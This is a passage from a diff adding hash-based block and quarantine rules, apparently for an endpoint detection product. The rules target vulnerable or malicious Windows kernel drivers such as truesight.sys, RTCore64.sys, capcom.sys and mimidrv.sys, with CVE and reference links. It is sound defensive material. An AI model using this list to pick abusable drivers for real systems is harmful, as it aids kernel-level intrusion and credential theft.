"2026-03-23T11:45:31.490663Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490668Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17e831c003dc45f8b63438c8aebf5805cceed30704c1306223964be1e3af7157", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ebff7451-45ef-564d-96e1-7e560c8206cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807767Z", + "creation_date": "2026-03-23T11:45:31.807770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d54ebc14e22dbcda953e2db38cf37e207bd8bfbc24e1ef8ddc0f107cc04d9a0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "ec0c6d51-b0c9-535b-8c3e-5ef550219775", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490173Z", + "creation_date": "2026-03-23T11:45:31.490175Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3df162270502add907987cf0deaf5faaa4080956e61de6ecb2fd4d58104ab9d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec0e5980-d803-560f-9ab7-5b55d17d5a97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824240Z", + "creation_date": "2026-03-23T11:45:30.824242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8e629a867377e1f49a9827caf036e9e2938d3a85e6e05f9d17a7e9236df2043", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec0fe2e2-85a1-5e70-90af-f990eefab756", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473574Z", + "creation_date": "2026-03-23T11:45:31.473578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d95fd391154cc4ff120ba41ab38120de99f5675d47919103bfc0f7647f872c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec17f731-75b0-54e8-bbbc-a193bfab9b3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495725Z", + "creation_date": "2026-03-23T11:45:31.495727Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac7835fc414e41ce60a7bdda8f7056a6502f878c19aef5f315b164348e3bb9d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec18bce5-2f88-59a2-9065-03e721305abe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461583Z", + "creation_date": "2026-03-23T11:45:30.461586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a67626fb468d3f114c23ac73fd8057f43d06393d3eca04da1d6676f89da2d40", + "comment": "Malicious Kernel Driver (aka 5a4fe297c7d42539303137b6d75b150d.sys) [https://www.loldrivers.io/drivers/75b9b0c5-dd3e-4cf3-a693-c80f2feabb6a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec1f5ac6-5f0f-54bd-b6f3-f1129a019eb1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616238Z", + "creation_date": "2026-03-23T11:45:29.616240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88df37ede18bea511f1782c1a6c4915690b29591cf2c1bf5f52201fbbb4fa2b9", + "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec258a4f-4d8f-5368-acc1-b3aab8578783", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607595Z", + "creation_date": "2026-03-23T11:45:29.607597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b4c925c3b8285aeeab9b954e8b2a0773b4d2d0e18d07d4a9d268f4be90f6cae", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec283ada-4417-50a0-9258-38c9cb6ae43e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833065Z", + "creation_date": "2026-03-23T11:45:30.833068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833077Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a25c80390c61f13ac79d1ecaf3768450c87e25e6cfc624a3124cce975d6a9212", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec3774db-a203-59b3-9940-d28015426670", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498200Z", + "creation_date": "2026-03-23T11:45:31.498204Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbf711e482cd15e4dd7c15317843831c32114b9690df0cba7df4ab0ed2903128", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec3a654e-3d37-5f88-a402-8884ca748e60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464654Z", + 
"creation_date": "2026-03-23T11:45:30.464657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec41d9db-66a8-5ca8-a83a-21804f0b0caf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977189Z", + "creation_date": "2026-03-23T11:45:29.977191Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977197Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72b36c64f0b349d7816c8e5e2d1a7f59807de0c87d3f071a04dbc56bec9c00db", + "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec476f7e-bc37-5683-8baa-6ab34ee94050", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617867Z", + "creation_date": "2026-03-23T11:45:29.617880Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617886Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e9072759433abf3304667b332354e0c635964ff930de034294bf13d40da2a6f", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec4e29c1-20f2-5ca1-a0e7-21bef6b25cf6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473701Z", + "creation_date": "2026-03-23T11:45:31.473705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.473715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09969e2f95e2468871720c997f479c1e7eec291f9508d8bab54c097649566538", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec59c5b0-cb29-51b6-be49-befb1da34ac3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817116Z", + "creation_date": "2026-03-23T11:45:31.817117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70596abead023e751825869d88ab90ebce30d5dd5dd91a4843846c34b7c81dfc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec5b1eed-3a22-54c6-9c4c-b9a7d5930607", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473945Z", + "creation_date": "2026-03-23T11:45:31.473958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1452d24bb5e59c62c57be70d13751ed1b64ffbc70f58767afee40b132e39fd70", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec5eb4cc-ff6d-5ee5-9489-9727761eafde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479775Z", + "creation_date": "2026-03-23T11:45:30.479777Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "ac26150bc98ee0419a8b23e4cda3566e0eba94718ba8059346a9696401e9793d", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec707408-bd85-53a1-bc1e-a705bfdee506", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148205Z", + "creation_date": "2026-03-23T11:45:31.148207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02436f1be9a7bd6d83e2166d256df9d7d009c58423a5f534181566575f065475", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec82d587-a9f1-5196-9f9e-cc487dfa3d2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620852Z", + "creation_date": "2026-03-23T11:45:29.620854Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5be61901f41d55e6fbd0994869015448f8eb0450ae38f67b75ddb594c3325aac", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec9749b9-c875-5de9-b273-d7035afd53a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492055Z", + "creation_date": "2026-03-23T11:45:31.492057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65c5ce7ced3df894429ae5afc7280d5f41a46af2bed07bd67915c338f62c0ed3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec982844-38dd-5f8c-b0b1-6a5ce724060b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144617Z", + "creation_date": "2026-03-23T11:45:31.144618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144624Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa99f49439a62d581d688d0fa420677d7fb45bc68ad6a998237b32f0acd44abe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ec9b57fa-3fc8-5f62-ad35-33f7bafafb3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489281Z", + "creation_date": 
"2026-03-23T11:45:31.489284Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25be784945f4308c9e2ee97b66132d938b4a0b298f09bc837809f312257bff10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eca8f958-78b9-5c3c-88cc-2caffb98c29f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971696Z", + "creation_date": "2026-03-23T11:45:29.971698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27f5c5eb9a5fc9e02d3ac3cd83fc26b07f3d0143b03db69d6dcf7554d0c50fb6", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "ecb1ec53-0ffb-5345-acce-4a68bd1c0d2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834353Z", + "creation_date": "2026-03-23T11:45:30.834356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834365Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce3b64eb877bfb70bfa2b7b436a40e95d59a21999f14218bc34bf588bd7b06bd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 